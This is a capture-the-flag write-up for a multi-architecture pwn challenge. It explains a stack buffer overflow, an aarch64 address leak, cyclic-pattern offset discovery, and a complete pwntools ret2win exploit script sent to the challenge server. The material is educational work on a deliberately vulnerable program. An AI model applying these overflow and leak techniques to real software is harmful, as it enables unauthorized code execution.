I picked the wrong path at Cyber Security Rumble 2024’s polypwn challenge and failed. Can you do it with more time and a win function? NOTE: Knowledge of polypwn is not required! Credit to @LevitatingLion for the original challenge and part of the code.

Category: pwn

Solver: nh1729

Flag: GPNCTF{line_breaks_in_addresses_make_me_sad_a39d9}

Writeup

Challenge Setup

This is a binary exploitation challenge. We get the source of the target program, composer.c, and a Python wrapper, composer.py. The program prints a menu that lets us either echo back a line or exit. The twist is that the program has been compiled for five different architectures: s390x, aarch64, arm, riscv64 and x86_64.

$ pwn checksec composer-*
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-aarch64'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-arm'
    Arch:     arm-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-riscv64'
    Arch:     riscv64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-s390x'
    Arch:     em_s390-64-big
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-x86_64'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

The wrapper starts one QEMU instance per architecture, each running the matching executable under a different user. Every line we send is forwarded to all of these processes. The wrapper then waits until every process has produced output, prints these outputs, and accepts new input.

The flag can be obtained from the wrapper under a specific condition: Every architecture receives an in-memory file on file descriptor 42. These files contain random tokens and if we submit all of these tokens to the wrapper, it prints the flag.

Therefore, we want to make all binaries of the program read from file descriptor 42 and print the result back to us. The program includes a win function which does exactly that:

void win() {
    char buf[0x11] = {0};
    read(42, buf, 0x10);
    write(1, buf, 0x10);
    printf("this printf solely exists to shift some stuff around in the binary...\n");
}

However, this function is never called. Instead, there is a buffer overflow in the function that echoes back a user provided line:

static void add_composer(void) {
    char buf[0x20];
    puts("enter composer:");
    int i = 0, c;
    while ((c = xgetchar()) != '\n') {
        buf[i++] = c;
    }
    fputs("composer: ", stdout);
    puts(buf);
    // TODO: add composer to db
}

The while loop behaves almost exactly like the unsafe gets function, except that xgetchar is a custom function that exits on EOF.
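One practical consequence of the loop above is that it stops at the first newline, so any byte we want on the stack must not be 0x0a. A minimal sketch of a check for encoded addresses follows; the helper name `newline_free` and the second example address are hypothetical and only serve as illustration.

```python
def newline_free(value: int, size: int, byteorder: str) -> bool:
    """Return True if the encoded value contains no 0x0a byte.

    The copy loop in add_composer ends at '\\n', so an address with a
    0x0a byte would cut the payload short at that position.
    """
    return b"\n" not in value.to_bytes(size, byteorder)


# A 4-byte little-endian address without a newline byte.
ok = newline_free(0x411238, 4, "little")

# Hypothetical address (not from the challenge) that contains 0x0a.
bad = newline_free(0x7F0A12345678, 8, "little")

print(ok, bad)
```

Null bytes are not a problem for this loop, since only the newline terminates it.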

Solution

The setup invites return-oriented programming (ROP): we just™ have to make every architecture jump to win when it returns. This can work because the return address sits at a different offset from our buffer on each architecture, so a single overflow can overwrite each of them with the respective win address.
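To illustrate the idea of one payload serving several architectures, here is a minimal stdlib-only sketch that places byte strings at fixed offsets and pads the gaps. The function name `layout`, the filler byte and the example offsets and values are assumptions for illustration, not the real challenge values.

```python
def layout(chunks: dict, filler: bytes = b"A") -> bytes:
    """Place each chunk at its offset and pad the gaps with filler bytes."""
    payload = bytearray()
    for offset, data in sorted(chunks.items()):
        if offset < len(payload):
            raise ValueError(f"chunk at {offset:#x} overlaps the previous one")
        payload += filler * (offset - len(payload))
        payload += data
    return bytes(payload)


# Illustrative values only: a 32-bit little-endian target at 0x10
# and a 64-bit big-endian target at 0x20.
example = layout({
    0x10: (0x1111).to_bytes(4, "little"),
    0x20: (0x2222).to_bytes(8, "big"),
})
print(example.hex())
```

Each architecture only cares about the bytes at its own return address offset; everything else is padding from its point of view, as long as the chunks do not overlap.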

We started off by finding the offsets for return addresses. Since we are used to x86_64, we opened it first in Ghidra and found that the add_composer function is inlined into main, meaning it is compiled as if someone replaced the call statement with the implementation. The next return is thus the one of main, which we can trigger within the menu.

Decompiled source x86_64

Looking at the stack layout, we find the offset to the return address:

Stack layout x86_64

With x86_64, the -0x58 indicates that buf starts 0x58 bytes before the return address. We therefore have to put the win address at 0x58 in the buffer. I naively proceeded identically for aarch64, arm and riscv64, but would later find out that the offsets do not work the same on them. s390x is not supported by Ghidra.

For the win addresses, we started the binaries with qemu-${ARCH} -g 1234 composer-${ARCH} and connected to them using gdb-multiarch with pwndbg:

pwndbg> target remote localhost:1234
`target:/.../polyrop-warmup/composer-aarch64' has disappeared; keeping its symbols.
Remote debugging using localhost:1234
Failed to read a valid object file image from memory.
0x00007fbe0c6704c0 in _start ()
pwndbg> i addr win
Symbol "win" is at 0x7fbe0c6707e4 in a file compiled without debugging.

The addresses were:

  • 0x411238 for arm
  • 0x5555555584b1 for x86_64
  • 0x7fbe0c6707e4 for aarch64
  • 0x5555555568fa for riscv
  • 0x2aa00000b20 for s390x. pwndbg did not know this architecture, but i addr win worked nonetheless.

Note that QEMU loads every binary except aarch64 at a static address, even though all of them are compiled as PIE. We can leak the randomized aarch64 base by sending a composer string that ends just short of the saved return address: the loop never null-terminates buf, so puts keeps printing past our input and echoes the return address back.
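The leak can be turned into a win address by subtracting a reference leak from one local run and adding the win address seen in that same run. The sketch below assumes the echoed line has the form `composer: ` + padding + leaked bytes + newline, with a padding length of 0x28 and the reference pair used in the exploit script; the helper names `parse_leak` and `rebase` are hypothetical.

```python
PREFIX = b"composer: "
PAD = 0x28  # assumed distance from buf to the saved return address on aarch64


def parse_leak(line: bytes) -> int:
    """Extract the little-endian bytes that puts printed after our padding."""
    leaked = line[len(PREFIX) + PAD:-1]  # drop the trailing newline
    return int.from_bytes(leaked, "little")


def rebase(leak: int, ref_leak: int, ref_win: int) -> int:
    """Shift the reference win address by the same delta as the leak."""
    return leak - ref_leak + ref_win


# Reference pair from one example execution.
REF_LEAK = 0x7FD5AE42EB90
REF_WIN = 0x7FD5AE42E7E4

# Simulated response for a run whose mapping is shifted by one page.
line = PREFIX + b"A" * PAD + (REF_LEAK + 0x1000).to_bytes(6, "little") + b"\n"
win = rebase(parse_leak(line), REF_LEAK, REF_WIN)
print(hex(win))
```

Only the difference between the leaked address and win matters, so the absolute values of the reference run are irrelevant as long as both come from the same execution.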

For the return address offset of s390x, I started the binary and pasted the output of cyclic 200 into the composer prompt.

qemu-s390x -g 1234 composer-s390x # Connect with gdb-multiarch, continue
welcome to advanced composer manager 5000!!  menu:  1. add composer  2. exit
1
enter composer:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
composer: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
2

With that, gdb displayed

Program received signal SIGSEGV, Segmentation fault.
0x6c6161626d616162 in ?? ()

As s390x is big-endian, 0x6c6161626d616162 decodes to "laabmaab". This appears at offset 0x90 in cyclic.
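The lookup can be reproduced without any tooling. The sketch below regenerates a de Bruijn pattern over the lowercase alphabet with subsequences of length 4, which should match the 200 characters pasted above, and searches it for the bytes of the crash address. The function names are hypothetical, and the generator is the textbook construction rather than a copy of any particular tool's code.

```python
from itertools import islice


def de_bruijn(alphabet: str, n: int):
    """Lazily yield a de Bruijn sequence over alphabet with window size n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def crash_offset(pc: int, byteorder: str, length: int = 200) -> int:
    """Return the pattern offset of the 8 bytes that ended up in pc."""
    pattern = "".join(islice(de_bruijn("abcdefghijklmnopqrstuvwxyz", 4), length))
    needle = pc.to_bytes(8, byteorder).decode("ascii")
    return pattern.find(needle)


offset = crash_offset(0x6C6161626D616162, "big")
print(hex(offset))  # 0x90
```

For a little-endian architecture the same function applies with `"little"` as the byte order, since the crash address then holds the pattern bytes in reversed order.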

With all offsets in hand (or so we thought), we built a small exploit:

from pwn import *
from ast import literal_eval

archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
r = process('python ./composer.py', shell=True)

def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result : bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out

print(read_response(r))
r.sendline(b'1')
print(read_response(r))
r.sendline(b'A' * 0x28)
A = read_response(r)

aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_win = aarch_leak - 0x7fd5ae42eb90 + 0x7fd5ae42e7e4

payload = flat({
    0x40: int.to_bytes(0x411238, 4, 'little'), # arm
    0x58: int.to_bytes(0x5555555584b1, 8, 'little'), # x86_64
    0x60: int.to_bytes(aarch_win, 8, 'little'), # aarch64
    0x78: int.to_bytes(0x5555555568fa, 8, 'little'), # riscv
    0x90: int.to_bytes(0x2aa00000b20, 8, 'big'), # s390x
})
r.sendline(b'1')
print(read_response(r))
r.sendline(payload)
read_response(r)
r.sendline(b'2')
r.interactive()

Output:

s390x: b'd5ca90029e532d45this printf solely exists to shift some stuff around in the binary...\n'
aarch64: b''
arm: b''
riscv64: b''
x86_64: b'86eaf80b7d976ab0this printf solely exists to shift some stuff around in the binary...\n'

Hm, that is fewer successful architectures than I expected. While the script ran, the kernel dropped core dumps into the working directory. Inspecting them showed that the failing architectures had crashed at addresses made up of cyclic pattern bytes instead of jumping to win. Apparently, Ghidra showing buf at stack offset -X only means that the return address sits X bytes after buf on x86_64, not on the other architectures. Using the same cyclic technique as for s390x, we found the real offsets.

With these in hand, all architectures printed their tokens and we could complete our exploit.

Exploit

from pwn import *
from ast import literal_eval

archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
# r = process('python ./composer.py', shell=True)
r = remote("wiggle--snoop-dogg-1893.ctf.kitctf.de", "443", ssl=True)

def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result: bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out

# Leak aarch64 address
print(read_response(r))
r.sendline(b'1')
print(read_response(r))
r.sendline(b'A' * 0x28)
A = read_response(r)

aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_win = aarch_leak - 0x7fd5ae42eb90 + 0x7fd5ae42e7e4 # Magic numbers from exemplary execution

payload = flat({
    0x90: int.to_bytes(0x2aa00000b20, 8, 'big'),     # s390x
    0x28: int.to_bytes(aarch_win, 8, 'little'),      # aarch64
    0x3c: int.to_bytes(0x411238, 4, 'little'),       # arm
    0x70: int.to_bytes(0x5555555568fa, 8, 'little'), # riscv64
    0x58: int.to_bytes(0x5555555584b1, 8, 'little'), # x86_64
})

# Overflow
r.sendline(b'1')
print(read_response(r))
r.sendline(payload)

# Return from main
read_response(r)
r.sendline(b'2')

tokens_raw = read_response(r)

r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])

r.interactive()